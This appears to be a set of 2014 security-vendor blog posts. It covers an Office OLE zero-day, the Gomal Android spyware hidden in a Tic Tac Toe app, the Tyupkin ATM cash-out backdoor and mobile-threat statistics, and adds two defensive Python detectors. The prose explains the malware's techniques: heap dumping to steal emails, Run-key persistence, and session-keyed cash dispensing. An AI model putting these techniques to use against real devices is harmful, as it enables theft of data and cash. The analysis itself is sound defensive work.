The Windows OLE vulnerability patched with MS14-060 is surprisingly rated "Important" by Microsoft. The APT known as the "Sandworm team" deployed CVE-2014-4114 in incidents against targets alongside other known exploits. The group was known for deploying new variants of the BlackEnergy bot in cyber-espionage campaigns, hitting geopolitical and military targets. In one incident, the team sent spearphish as a PowerPoint slide deck containing the 0day OLE exploit to Ukrainian government and US academic organizations. When opened, the slides dropped newer variants of BlackEnergy to the victim systems. These newer variants of BlackEnergy maintain functionality dedicated to cyber espionage tasks. The most interesting characteristics of these BlackEnergy trojans are the custom plugins or modules, but that's for a different blog post. Our GReAT researchers Maria Garnaeva and Sergey Lozhkin spoke about interesting BlackEnergy functionality at the May 2014 PHDays conference.

Another group known as Hurricane Panda attempted to exploit CVE-2014-4113 in targeted environments. This escalation of privilege issue can present a real problem in situations where an attacker has gotten into a network and is attempting to burrow in further. This bug also exists in Windows kernel code, and is patched by the same MS14-058 bulletin mentioned above.

The Internet Explorer update addresses fourteen vulnerabilities, rated critical for IE6 through IE11. They do not affect Server Core installations.

More can be read about October 2014 Microsoft Security Bulletins here.

Tic Tac Toe with a twist

Fri, 10/10/2014 - 05:00

UPDATE / OCT, 15.

Further to this blog post, describing malicious functions of a mobile Trojan camouflaged as the TicTacToe game app, Lacoon Mobile Security company stated that TicTacToe was developed by them as a proof-of-concept.

Kaspersky Lab would like to reiterate that, as a security company, we detect all forms of malicious program, regardless of their origin or purpose. We received the samples through malware exchange with other antivirus companies and it was not marked as a proof-of-concept at this time. We saw several potentially malicious functions in this app – and a thorough analysis of TicTacToe revealed that the game code accounted for less than 30% of the executable file's size. The rest is functionality for monitoring the user and obtaining personal data. It is for this reason that we began the investigation and reported the incident to the public.

We respect and support other security companies who aspire to the development of mobile technologies, but we also believe that proof-of-concept programs should be marked clearly and shouldn't demonstrate fully-operational functions, to avoid situations where malicious users replicate the techniques.

Attempts by cybercriminals to disguise malware as useful applications are common to the point of being commonplace. However, the developers of Gomal, a new mobile Trojan, not only achieved a new level of camouflage by adding a Tic Tac Toe game to their malicious program, but also implemented interesting techniques which are new to this kind of malware.

It all started with a Tic Tac Toe game being sent to us for analysis. At first glance, the app looked quite harmless:

However, the list of permissions requested by the game made us wonder. Why would it need to access the Internet, the user's contacts and the SMS archive or to be able to process calls and record sound? We analyzed the 'game' and it turned out to be a piece of multi-purpose spyware. The malicious app is now detected by Kaspersky Lab products as Trojan-Spy.AndroidOS.Gomal.a.

A thorough analysis of the malicious program showed that the game code accounts for less than 30% of the executable file's size. The rest is functionality for spying on the user and stealing personal data.

Game code is marked in green, malicious functionality – in red

What does this functionality include? First and foremost, the malware has sound recording functions, which are now standard for mobile spyware:

It also has SMS-stealing functionality:

In addition, the Trojan collects information about the device and sends all the data collected to its masters' server. But Trojan-Spy.AndroidOS.Gomal.a has something really curious up its sleeve – a package of interesting libraries distributed with it.

The package includes an exploit used to obtain root privileges on the Android device. The extended privileges give the app access to various services provided by Linux (the operating system on which Android is based), including the ability to read process memory and /maps.

After obtaining root access, the Trojan gets down to work. For example, it steals emails from Good for Enterprise, if the app is installed on the smartphone. The application is positioned as a secure email client for corporate use, so the theft of data from it can mean serious problems for the company where the owner of the device works. In order to attack Good for Enterprise, the Trojan uses the console to get the ID of the relevant process (ps command) and reads the virtual file /proc/<pid>/maps. The file contains information about memory blocks allocated to the application.

After getting the list of memory blocks, the malware finds the block [heap] containing the application's string data and creates its dump using one more library from its package. Next, the dump file created is searched for signatures characteristic of emails and the messages found are sent to the cybercriminals' server.

Gomal also steals data from logcat – the logging service built into Android that is used for application debugging. Developers very often have their applications outputting critically important data to Logcat even after the apps have been released. This enables the Trojan to steal even more confidential data from other programs.

As a result, the seemingly harmless game of Tic Tac Toe gives cybercriminals access to an enormous amount of the user's personal data and corporate data belonging to his employer. The techniques used by Gomal were originally implemented in Windows Trojans, but now, as we can see, they have moved on to Android malware. And, most dangerously, the principles upon which this technique is based can be used to steal data from applications other than Good for Enterprise – it is likely that a range of mobile malware designed to attack popular email clients, messengers and other programs will appear in the near future.

To reduce the risk of infection by mobile malware we recommend that users:
  • Do not activate the "Install applications from third-party sources" option
  • Only install applications from official channels (Google Play, Amazon Store, etc.)
  • When installing new apps, carefully study which rights they request
  • If the requested rights do not correspond with the app's intended functions, do not install the app
  • Use protection software
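The permission review described above (the rights the 'game' requested, and the advice to compare requested rights with an app's intended functions) can be automated for a decoded AndroidManifest.xml. This is an added example, not part of the original article or of any Kaspersky tool; the category baseline, the function names and the sample manifest are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID_NAME = "{http://schemas.android.com/apk/res/android}name"
NETWORK = "android.permission.INTERNET"

# Permissions behind the capabilities the article questions for a game.
DATA_SOURCES = {
    "android.permission.READ_CONTACTS": "read the user's contacts",
    "android.permission.READ_SMS": "read the SMS archive",
    "android.permission.PROCESS_OUTGOING_CALLS": "process calls",
    "android.permission.RECORD_AUDIO": "record sound",
    "android.permission.READ_LOGS": "read logcat output",
}

# Assumption: a reviewer-maintained baseline of what each category may request.
BASELINE = {
    "offline_game": set(),
    "online_game": {NETWORK},
    "voice_recorder": {"android.permission.RECORD_AUDIO"},
}

# Constructed manifest (already decoded to text XML); not the real sample's.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.tictactoe">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <application android:label="Tic Tac Toe"/>
</manifest>
""".strip()


def requested_permissions(manifest_xml):
    """Return the set of permission names declared in a decoded manifest."""
    # The manifest comes from an untrusted package: refuse DTDs and entities
    # instead of letting the XML parser expand them.
    if "<!DOCTYPE" in manifest_xml or "<!ENTITY" in manifest_xml:
        raise ValueError("DTD/entity declarations are not expected in a manifest")
    root = ET.fromstring(manifest_xml)
    perms = set()
    for tag in ("uses-permission", "uses-permission-sdk-23"):
        for node in root.iter(tag):
            name = node.get(ANDROID_NAME)
            if name:
                perms.add(name.strip())
    return perms


def audit(manifest_xml, category):
    """Compare requested permissions with the baseline for the app category."""
    requested = requested_permissions(manifest_xml)
    allowed = BASELINE[category]
    tracked = set(DATA_SOURCES) | {NETWORK}
    unexpected = sorted((requested - allowed) & tracked)
    collectors = [p for p in unexpected if p in DATA_SOURCES]
    return {
        "unexpected": unexpected,
        "capabilities": [DATA_SOURCES[p] for p in collectors],
        # Data collection plus network access is the combination spyware needs.
        "collect_and_send": bool(collectors) and NETWORK in requested,
    }


if __name__ == "__main__":
    report = audit(SAMPLE_MANIFEST, "online_game")
    for capability in report["capabilities"]:
        print("not expected for this category:", capability)
    print("can collect and send:", report["collect_and_send"])
```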

Update:

Trojan-Spy.AndroidOS.Gomal.a uses an old version of the exploit, which is effective on Samsung devices running Android 4.0.4 or earlier. This particular version of the malware could not successfully attack a corporate email client on devices with newer firmware.
So far, we have not seen any attempts to infect our users with the Gomal Trojan. However, even though this sample is not currently active in-the-wild, we detect it so we will be able to block any future attacks by mobile malicious programs based on this proof-of-concept malware.

Tyupkin: Manipulating ATM Machines with Malware

Tue, 10/07/2014 - 04:00

Earlier this year, at the request of a financial institution, Kaspersky Lab's Global Research and Analysis Team performed a forensics investigation into a cyber-criminal attack targeting multiple ATMs in Eastern Europe.

During the course of this investigation, we discovered a piece of malware that allowed attackers to empty the ATM cash cassettes via direct manipulation.

At the time of the investigation, the malware was active on more than 50 ATMs at banking institutions in Eastern Europe.  Based on submissions to VirusTotal, we believe that the malware has spread to several other countries, including the U.S., India and China.

Due to the nature of the devices where this malware is run, we do not have KSN data to determine the extent of the infections. However, based on statistics culled from VirusTotal, we have seen malware submissions from the following countries:


This new malware, detected by Kaspersky Lab as Backdoor.MSIL.Tyupkin, affects ATMs from a major ATM manufacturer running Microsoft Windows 32-bit.

The malware uses several sneaky techniques to avoid detection. First of all, it is only active at a specific time at night.  It also uses a key based on a random seed for every session. Without this key, nobody can interact with the infected ATM.

When the key is entered correctly, the malware displays information on how much money is available in every cassette and allows an attacker with physical access to the ATM to withdraw 40 notes from the selected cassette.

Most of the analyzed samples were compiled around March 2014. However, this malware has evolved over time. In its last variant (version .d) the malware implements anti-debug and anti-emulation techniques, and also disables McAfee Solidcore from the infected system.

Analysis

According to footage from security cameras at the location of the infected ATMs, the attackers were able to manipulate the device and install the malware via a bootable CD.

The attackers copied the following files into the ATM:

C:\Windows\system32\ulssm.exe
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\AptraDebug.lnk

After some checks of the environment, the malware removes the .lnk file and creates a key in the registry:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"AptraDebug" = "C:\Windows\system32\ulssm.exe"
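A check for this persistence entry in an exported registry file, as an added example and not the verification procedure Kaspersky Lab offers on request: it parses the text format written by reg export and flags Run-key values that use the value name or the executable name given above, including when only one of the two was kept. The function names are assumptions and the sample export is constructed.

```python
import ntpath
import re

# Indicators stated in the article (compared case-insensitively).
RUN_KEY_SUFFIX = r"\software\microsoft\windows\currentversion\run"
IOC_VALUE_NAME = "aptradebug"
IOC_IMAGE_NAME = "ulssm.exe"

# Constructed export in the "reg export" / regedit text format.
# Real exports are UTF-16; decode them before calling scan_reg_export().
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"VendorAgent"="\"C:\\Program Files\\Vendor\\agent.exe\" /quiet"
"AptraDebug"="C:\\Windows\\system32\\ulssm.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Cleanup"="C:\\Temp\\cleanup.exe"
'''

# "name"="string data", where both sides may contain \\ and \" escapes.
STRING_VALUE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"\s*$')


def _unescape(text):
    """Undo the backslash escaping used inside .reg string values."""
    return re.sub(r"\\(.)", r"\1", text)


def image_name(command):
    """Return the lower-cased executable file name from an autorun command."""
    command = command.strip()
    if command.startswith('"'):
        path = command[1:].split('"', 1)[0]
    else:
        match = re.match(r"(.+?\.exe)\b", command, re.IGNORECASE)
        path = match.group(1) if match else command.split(" ", 1)[0]
    return ntpath.basename(path).lower()


def scan_reg_export(text):
    """Return Run-key string values that match either indicator."""
    findings, key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        match = STRING_VALUE.match(line)
        if not match or key is None:
            continue
        if not key.lower().endswith(RUN_KEY_SUFFIX):
            continue  # only the Run key is described in the article
        name, data = _unescape(match.group(1)), _unescape(match.group(2))
        reasons = []
        if name.lower() == IOC_VALUE_NAME:
            reasons.append("value name")
        if image_name(data) == IOC_IMAGE_NAME:
            reasons.append("image name")
        if reasons:
            findings.append({"key": key, "name": name,
                             "data": data, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in scan_reg_export(SAMPLE_REG):
        print(hit["key"], hit["name"], hit["data"], hit["reasons"])
```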

The malware is then able to interact with the ATM through the standard library MSXFS.dll – Extension for Financial Services (XFS).

The malware runs in an infinite loop waiting for user input. In order to make it more difficult to detect, Tyupkin accepts (by default) commands only on Sunday and Monday nights.

It accepts the following commands:

  • XXXXXX – Shows the main window.
  • XXXXXX – Self deletes with a batch file.
  • XXXXXX – Increases the malware activity period.
  • XXXXXX – Hides the main window.

After every command the operator must press "Enter" on the ATM's pin pad.

Tyupkin also uses session keys to prevent interaction with random users. After entering the "Show the main window" command, the malware shows the message "ENTER SESSION KEY TO PROCEED!" using a random seed for each session.

The malicious operator must know the algorithm to generate a session key based on the seed shown. Only when this key is entered successfully is it possible to interact with the infected ATM.

After that, the malware shows the following message:

CASH OPERATION PERMITTED.
TO START DISPENSE OPERATION -
ENTER CASSETTE NUMBER AND PRESS ENTER.

When the operator chooses the cassette number, the ATM dispenses 40 banknotes from it.

When the session key entered is incorrect, the malware disables the local network and shows the message:

DISABLING LOCAL AREA NETWORK...
PLEASE WAIT...

It is not clear why the malware disables the local network. This is likely done to delay or disrupt remote investigations.

Video with a demonstration in a real ATM is available:

Conclusion

Over the last few years, we have observed a major uptick in ATM attacks using skimming devices and malicious software.  Following major reports of skimmers hijacking financial data at banks around the world, we have seen a global law enforcement crackdown that led to arrests and prosecution of cyber-criminals.

The successful use of skimmers to secretly swipe credit and debit card data when customers slip their cards into ATMs at banks or gas stations is well known and has led to a greater awareness for the public to be on the lookout – and take precautions – when using public ATMs.

Now we are seeing the natural evolution of this threat with cyber-criminals moving up the chain and targeting financial institutions directly. This is done by infecting ATMs directly or through direct APT-style attacks against the bank. The Tyupkin malware is one such example of attackers moving up the chain and finding weaknesses in the ATM infrastructure.

The fact that many ATMs run on operating systems with known security weaknesses and the absence of security solutions is another problem that needs to be addressed urgently.

Our recommendation for banks is to review the physical security of their ATMs and consider investing in quality security solutions.

Mitigation recommendations

We recommend that financial institutions and businesses that operate ATMs on premises consider the following mitigation guidance:

  • Review the physical security of their ATMs and consider investing in quality security solutions.
  • Change default upper pool lock and keys in all ATMs. Avoid using default master keys provided by the manufacturer.
  • Install an ATM security alarm and make sure that it works. It was observed that the cyber-criminals behind Tyupkin infected only those ATMs that had no security alarm installed.
  • For the instructions on how to verify that your ATMs are not currently infected in one step, please contact us at intelreports@kaspersky.com. For the full scan of the ATM's system and deleting the backdoor, please use the free Kaspersky Virus Removal Tool (you may download it here).

General advice for on-premise ATM operators

  • Ensure the ATM is in an open, well-lit environment that is monitored by visible security cameras. The ATM should be securely fixed to the floor with an anti-lasso device that will deter criminals.
  • Regularly check the ATM for signs of attached third-party devices (skimmers).
  • Be on the lookout for social engineering attacks by criminals who may be masquerading as inspectors of security alarms, security cameras or other devices on premises.
  • Treat intruder alarms seriously and act accordingly by notifying law enforcement authorities of any potential breach.
  • Consider filling the ATM with just enough cash for a single day of activity.
  • For more advice for both merchants and users, please visit http://www.link.co.uk/AboutLINK/site-owners/Pages/Security-for-ATMs.aspx

Mobile Cyber-threats: A Joint Study by Kaspersky Lab and INTERPOL

Mon, 10/06/2014 - 07:00


International Cooperation to Combat Cybercrime

Cyber-threats, including those targeting mobile devices, are directly linked to cybercrime. In most developed countries, creating and distributing malicious software is a criminal offence. Although such criminal acts are perpetrated in virtual environments, their victims lose real assets, such as personal data and money.

Combating cybercrime is particularly difficult because cybercriminals do not need to cross the borders of other countries to commit crimes in those territories. At the same time, enforcement authorities in these same countries have to overcome numerous barriers in order to administer justice. Therefore, international cooperation between information security experts and law enforcement authorities is required to effectively combat crime in the virtual world. Kaspersky Lab is an international company that brings together IT security experts from all over the world and seeks to provide detailed and highly qualified technical consultations to assist local law-enforcement agencies investigating cybercrime.

To cooperate as effectively as possible against international cybercrime, Kaspersky Lab and the International Criminal Police Organization (INTERPOL) have established a partnership, under which Kaspersky Lab experts will share their expertise in cyber-threat analysis with INTERPOL officers.

This "Mobile cyber-threats" report has been prepared by Kaspersky Lab and INTERPOL within that partnership framework. It aims to evaluate how widespread mobile threats are, and to alert the international IT security and law enforcement community to the problem of crime in the area of mobile communications.

Introduction: The Mobile Leader and Target no. 1

Smartphones and tablets have long been established as popular personal electronics devices. A joint Kaspersky Lab and B2B International survey conducted in the spring of 2014 found that 77% of the Internet users surveyed use several devices to access the World Wide Web; alongside traditional computers, they typically use smartphones and tablets. So what types of smartphones and tablets are used?

According to IDC's Q2 2014 report, the sales of such devices have, for the first time ever, passed the mark of 300,000,000 devices sold per quarter. This is an important milestone in the market that has been growing for several years.

According to the same IDC report, the distribution of operating systems for mobile devices looks like this:

Figure 1. Distribution of mobile operating systems in Q2 2014, according to IDC. Source: IDC

As the diagram shows, nearly 85% of the mobile device market was occupied by Android in Q2 2014. These numbers are an acknowledgement of Android's undisputed leadership among mobile environments. This operating system is free for device manufacturers and can be easily modified to match various business needs, which has helped it achieve popularity among smartphone and tablet developers as well as consumers across the world. This also means that Android-based devices inevitably attract the attention of cybercriminals who are  creating and distributing malicious programs.

Kaspersky Lab experts estimate that 98.05% of all existing mobile malware targets the users of Android devices. So, how much is "all existing malware"? Kaspersky Lab experts report that in the first half of 2014 alone, 175,442 new unique Android malicious programs were detected. That is 18.3% (or 32,231 malicious programs) more than in the entire year of 2013.

For these and other reasons, it is safe to say that the vast majority of mobile cyber-threats are targeting Android.

Figure 2. The distribution of Kaspersky Lab products' malware detections in 2013 between different mobile environments

It is easy to understand why cybercriminals create so many malicious programs targeting Android devices: these days, smartphones are increasingly often used as a tool to pay online for merchandise and services.

Apps can be installed through Google Play as well as third parties such as Amazon App store. Third party apps pose a security threat to users who enable the installation of apps from unverified sources. These unverified packages may carry malware that would be installed on a device without the user's permission or knowledge.

Another danger is the possibility of an attacker gaining access to personal data such as the user's cloud storage accounts and associated email identifiers. This information can be used to access personal content that is stored in cloud-based storage without the user's knowledge or permission.

Smartphones can also be regarded as a kind of mobile sensor, since they routinely collect a multitude of personal information about their owners. In other words, mobile device users are a very valuable target for cybercriminals.

Figure 3. The scheme of actors involved in cybercrime. Source: INTERPOL

Information is the new currency and this has led to a drastic change in the structure of organized criminal groups, which now support a larger group of actors. The bottom-to-top approach leaves us with three basic categories: (1) The Infectors, (2) The Analysts, and (3) The Investors. The Infectors' role is to mass-propagate and exploit devices as well as pick up data from the devices with very little discrimination about the type of data collected - the more the better. The Analysts' job revolves around studying and processing the data that was collected, monetizing it by offering it on underground markets, blackmailing individuals or using the information to invest into markets that would eventually allow the criminals to profit from illegally obtained information or insider trading. The Investors are responsible for funding and providing financial support to the pyramid – obviously they then receive the majority of the profits made over time.

This model has overtaken the lone hacker scenario, which is now merely a media misconception. When it comes to mobile devices, it has been underlined that they can be a greater source of personal or business information than desktop computers. That, coupled with the fact that these devices are often less secure, has caused Infectors to refocus their efforts onto the mobile device sector.

Of course these and other factors have an effect on how often smartphone and tablet users encounter dangerous software while accessing the Internet from their mobile devices.

How much risk is there in being an active Android user, and how can users reduce that risk? Details on this are provided in this report.

Methodology

This study focused on the 12-month period of 1 August 2013 through 31 July 2014. This study period was chosen based on Kaspersky Lab data. Kaspersky Lab began to collect statistics on attacks against Android users in May 2012. During the more than two years that followed, it was the above mentioned time frame that showed that the number of Android threats, the number of attacks and the number of attacked users grew particularly sharply.

Figure 4. Detections by Kaspersky Lab's security products of cyber-attacks on Android devices throughout the entire history of observations. All data sourced from Kaspersky Security Network, unless stated otherwise

Naturally, this dramatic increase partly comes from the increasing numbers of users who purchased Kaspersky Lab's mobile security products. However, this is not the sole, nor even the main factor, behind this growth.

Apart from changes in the numbers of launched attacks and attacked users, this study will also focus on the geographic distribution of attacks and users. Additionally, a list of the most widespread malicious programs for Android will be analyzed.

Data used in this research was sourced from the cloud-based Kaspersky Security Network (KSN), which includes more than 5,000,000 users of Android-based smartphones and tablets protected by Kaspersky Lab products. This research analyzes threat data collected from these devices.

The Main Findings
  • Over a 12 month period, Kaspersky Lab security products reported 3,408,112 malware detections on the devices of 1,023,202 users.
  • Over the 10 month period from August 2013 through March 2014, the number of attacks per month was up nearly tenfold, from 69,000 in August 2013 to 644,000 in March 2014.
  • The number of users attacked also increased rapidly, from 35,000 in August 2013 to 242,000 in March.
  • 59.06% of malware detections related to programs capable of stealing users' money
  • About 500,000 users have encountered mobile malware designed to steal money at least once.
  • Russia, India, Kazakhstan, Vietnam, Ukraine and Germany are the countries with the largest numbers of attacks reported.
  • Trojans designed to send SMSs were the most widespread malicious programs in the reporting period. They accounted for 57.08% of all detections.
  • The number of modifications for mobile banking Trojans increased 14 times over 12 months, from a few hundred to more than 5000.

Part 1: General trends in the evolution of mobile threats

There are those who believe that Android is a secure platform. When confronted with the fact that new Android malware emerges every day, these people often say that those malicious programs are in fact very rare and pose only a limited threat to the owners of Android devices. For a long time, these views have been justified. If we look at the historical course of the number of existing Android threats (see Figure 4), we will indeed see that before the summer of 2013 the numbers of attacks and attacked users were well below 100,000 a month. That looked very modest as compared to PC attack numbers.

However, this situation changed dramatically during the period analyzed in this paper. In the 12 months from August 2013 through July 2014, over 1,020,000 Android users across the globe encountered more than 3,400,000 attacks. That was six times more than the number of attacks in the whole of the previous 1.5 years when records were kept.

Over the reporting period, the number of attacks showed a dramatic growth, increasing nearly 10 times from 69,000 in August 2013 to 644,000 in March 2014. Then there was a sudden fall in activity, down to 216,000 incidents in June.

Figure 5. Number of Kaspersky Lab Android product detections of malware targeting Android devices. August 2013 through July 2014

At the end of the Holiday season, there was no decrease in the activity, despite expectations. Instead, there was a further dramatic spike. The decline only began in April.

The geographic distribution of attacks and attacked users

More than half (52%) of attacks during the study period were reported in Russia. This is primarily due to the fact that Russian residents form a particularly large proportion of the users who agreed to have their statistics sent to Kaspersky Security Network.

Figure 6. Top 15 countries with highest numbers of users attacked between April 2013 and July 2014

Another contributing factor is the wide popularity of various mobile payment services in Russia. These allow users to pay for goods or services by sending premium SMSs. This encourages cybercriminals to create and distribute Android malware exploiting these services.

However, it may be misleading to think that the malware industry is well-developed in Russia and comparatively calm in the rest of the world. Russian-speaking cybercriminals are definitely interested in foreign markets. Two banking Trojans, Faketoken and Svpeng, are vivid examples of such attempts at globalization. These two were created to launch attacks on the clients of foreign banks, and only a few versions target Russian users.

Part 2: The 'Star' Performers

As predicted, the number of attacks increased over time, and more malware modifications were detected.

Figure 7. Number of modifications of Android malicious applications, as detected by Kaspersky Lab in August 2013 – July 2014

This number rose by a factor of nearly 3.4 over the year, from 120,500 malware modifications in August 2013 to 410,800 in July 2014.

For the study period, the most widespread malware in the top 10 was mostly of the Trojan-SMS type – these programs accounted for 57.08% of all attacks. RiskTool programs followed, accounting for 12.52% of detections. These are nominally legitimate programs that can also be used for malicious purposes, such as sending SMS with a visual notification of the user, transmitting geo-data etc. Aggressive advertising software (adware) came in third (7.37%).

Figure 8. Distribution of attacks by malware types: Top 10 most active malware types. August 2013 – July 2014

These overall statistics are affected by the large number of Russian users and the popularity of SMS payments in Russia. To eliminate any possible "Russian" bias, we also looked at the cyber-threat landscape described without data collected from users in Russia.

Figure 9. Distribution of attacks by malware types, excluding data from Russian users. August 2013 – July 2014

As can be seen in the diagram, the numbers have changed. However, the overall situation remains broadly similar: Trojan-SMS is still the most widespread type of malware. Below is a graph showing the Top 10 countries with the largest numbers of reported attacks involving Trojan-SMS malware:

Figure 10. Top 10 countries with the largest numbers of reported attacks involving Trojan-SMS malware. August 2013 – July 2014

Attacks involving Trojan-SMS malware are most frequent in Russia. Residents of Kazakhstan, Ukraine, the UK, Spain, Vietnam, Malaysia, Germany, India, France and other countries also encounter attacks involving this type of malware.

Malware created with the sole aim of stealing money from victims (i.e. Trojan-SMS and Trojan-Banker malware types) accounted for 59.06% of attacks and was reported on the devices of 49.28% of users during the study period. In absolute numbers that represents half a million users who agreed to have their statistics on detected threats sent to KSN.

It is hardly surprising that cybercriminals actively use financial Trojans. According to a B2B International report, 53% of polled smartphone and tablet users say they use the devices to pay online. In other words, cybercriminals can theoretically make money on every second user of a mobile device. Statistics show that approximately every second user is indeed attacked by cybercriminals.

Legitimate surveillance

Approximately 2.72% of all detections, or 92,600 detections, involved "Monitor" class programs. In Kaspersky Lab's classification, this stands for conditionally legitimate applications designed to conduct surveillance over smartphone users. These applications can track the user's location, read his/her messages, and access other personal information. The manufacturers of such software advertise it as a useful tool to help look after children and the elderly, but Kaspersky Lab classifies it as insecure. A total of 41,400 users encountered such applications in the 12-month period. On average, each of these users encountered such programs twice.

Interestingly, the geographical distribution of these programs is noticeably different from the overall global distribution of malware detections.

Figure 11. The geographical distribution of detected "legitimate" spyware in the "Monitor" class. August 2013 – July 2014

India is in first position with 19.73% of all detections. Russia is in second place with 14.72% of all detections (even though it is the leader of the general threat ranking). Users in the USA also quite often encounter these applications (7.59% of detections), followed by the UK (6.8%) and Germany (4.56%). Kaspersky Lab experts have no reason to assume all these detection cases are attempts to secretly install these programs on a device protected by a Kaspersky Lab product. However, this scenario is possible, so Kaspersky Lab security products detect Monitor-class programs as potentially dangerous.

Part 3: Trojan-SMS and the 'Legitimate' Business of Affiliate Programs

During the reporting period, 452 different modifications of 62 different Trojans capable of using SMS messaging were detected.

Figure 12: Distribution of attacks involving the most widespread SMS Trojans during the period from August 2013 to July 2014

Malware from the Agent family had the largest proportion of detections (28.57%), followed by FakeInst (22.4%) in second place and Stealer (21.59%) in third.

According to Kaspersky Lab experts, affiliate programs are one of the most common ways of delivering malicious code.

A typical setup for a malicious affiliate program is as follows: a group of cybercriminals creates an affiliate website and invites Internet users to become their accomplices and make money by distributing a malicious program. A unique modification of the malware and a landing page from which it will be downloaded to victims' devices are created for each user who agrees to take part. After that, participants of the affiliate program buy Internet traffic from third parties or bring in users by redirecting requests from compromised websites, displaying banners on popular Web resources or creating their own sites and promoting them using search-engine optimization. The objective is to have as many Android users as possible visit the page hosting the malicious application. After each successful installation, the newly-infected device starts sending SMS messages to premium numbers, making money for the cybercriminals. Part of that money is paid to the affiliate partners. Criminal groups that sell Web traffic usually resort to various social engineering techniques, attracting users with pornography, free games, etc.

According to Kaspersky Lab experts, about 38% of users who end up on these landing pages will download malicious apps from them. About 5% of users go on to install these applications. Cybercriminals can earn millions of dollars in net profits from this activity.

During the study period, Kaspersky Lab experts observed at least four large active affiliate programs, accounting for about one quarter of all attacks recorded over that time. All of these affiliate programs were primarily active in Russia and countries of the former Soviet Union, but each program used a different family of SMS Trojans.

Figure 13: Activity of four affiliate programs distributing Android malware from August 2013 to July 2014

In the beginning of the period under consideration, there were three 'leaders' in this market: Fakeinst.am, Opfake.bo and Opfake.a, of which Opfake.bo was the most active and successful. However, the situation changed radically in October 2013 with the appearance of a new player – Stealer.a. It was different from competing malware in that it had more extensive functionality and spread very actively. By November 2013 it was the most frequently detected affiliate program and remained at the top throughout the rest of the research period.

2014: bad news for malicious affiliate programs

The abovementioned attacks conducted using SMS Trojans were different from typical malicious campaigns targeting PCs in one important respect. Legitimate legal entities, mostly registered in Russia, were involved in distributing Android Trojans and profited from the consequences of infecting smartphones. The business model of affiliate programs that distribute applications and premium content is not illegal, but there is indirect evidence that the companies behind some of the affiliate programs described above worked with cybercriminals as well as those who distribute legitimate content and apps.

This situation continued for a long time, because neither the heavy penalties issued by mobile-phone operators for mounting fraud campaigns nor criminal liability for distributing malware managed to stop cybercriminals or the organizations that worked with them. However, everything changed in early 2014: shortly before changes in legislation aiming, among other things, to curtail SMS fraud came into effect, mobile-phone operators adopted an Advice of Charge (AoC) mechanism. Every time a customer (or an SMS Trojan) attempts to send a message to a premium number, the operator notifies the customer how much the service will cost and requests additional confirmation from the user.

Early in the year the mechanism was applied to selected types of premium SMS services and as of May 1, 2014 a new law made it obligatory for mobile-phone operators to notify their customers of any attempts to start any mobile subscription. This coincided with a radical fall in the number of attacks involving SMS Trojans.

The major surge in the number of attacks, particularly those involving Stealer.a, could have been an attempt to make as much money as possible before AoC was universally adopted. Kaspersky Lab experts observed that in spring 2014 the three affiliate programs which distributed Fakeinst.am, Opfake.bo and Opfake.a stopped active operation. Kaspersky Lab experts have no reason to believe that the three affiliate programs have run out of steam completely, but they lack their earlier vigor and the reduced number of attacks involving SMS Trojans is a good, albeit indirect, indication of this.

The most active program of the four – the one distributing Stealer.a – has also lost a lot of ground in terms of the number of attacks, but users often still come across versions of this malicious app.

Curiously, although all these affiliate programs were set up and maintained by Russian-speaking cybercriminals and their scams mostly targeted users from Russia and the former Soviet Union, parts of Europe saw fewer attacks involving SMS Trojans in spring, too.

Figure 14: Changes in the number of attacks involving Trojan-SMS in European countries where Kaspersky Lab products detected this type of malware from April to June 2014

The diagram above shows data about attacks involving Trojan-SMS in the European countries in the Top 10 for attacks using Trojan-SMS. The diagram shows that four of the five countries which ranked among those attacked most often have seen the number of attacks fall.

Towards the end of the period there was also a slight growth in the number of attacks in Germany by Agent.ao malware, which was distributed by an affiliate program primarily targeting that country. All other affiliate programs which had been active in Europe and Asia were noticeably less active.

Figure 15: Attacks involving Agent family Trojans from August 2013 to July 2014

In other words, the number of attacks was falling almost everywhere in the post-Soviet space, in Europe and in Asia.

This may be due to two reasons. First, cybercriminals wind down their activity during the vacation season, which begins in spring. Additionally, the Russian legislative developments described above may also have contributed to the decline. Kaspersky Lab experts have frequently observed that Russian-speaking developers of Android malware have global ambitions and adapt their malware, including Trojan-SMS, to attack markets where languages other than Russian are spoken. However, the number of detections recorded outside the post-Soviet space has always been significantly smaller than in Russia and its neighbors – in other words, it is unlikely that most distant targets brought much money to the owners of affiliate programs based in Russia. So when the main 'players' in a Russian segment of Android malware wound down their activity, this naturally resulted in the closure of their foreign 'projects'.

Admittedly, Kaspersky Lab experts do not have the solid evidence needed to confirm this theory, though if it is correct it would be an example of how anti-fraud measures in one country can have a beneficial effect – albeit a small one – elsewhere in the world.

Mobile banking Trojans: dangerous trends

A total of 67,500 attacks involving Trojan-Banker malware against 37.7 thousand users were recorded in the analysis period. Trojan-Banker is a type of malware designed to steal online banking credentials. The total number of banking Trojans targeting mobile devices grew from 423 in August of 2013 to 5,967 in July 2014. That is a more than 14-fold increase!

Figure 16: Changes in the number of attacks and users attacked by Trojan-Banker malware from August 2013 to July 2014

However, even though there were more malware variants, the decline in the use of Trojan-SMS malware also affected Trojan-Bankers. This was primarily because one of the banking Trojans was distributed using the same affiliate networks as Trojan-SMS malware.

Figure 17: Geographical distribution of users affected by Trojan-Banker on Android from August 2013 to July 2014

The overall downward trend was sparked by the Faketoken Trojan-Banker, which could steal one-time passwords sent to confirm bank transactions and operated in conjunction with 'desktop' banking Trojans.

Figure 18: Attacks involving Faketoken, compared to all attacks involving mobile banking Trojans from August 2013 to July 2014

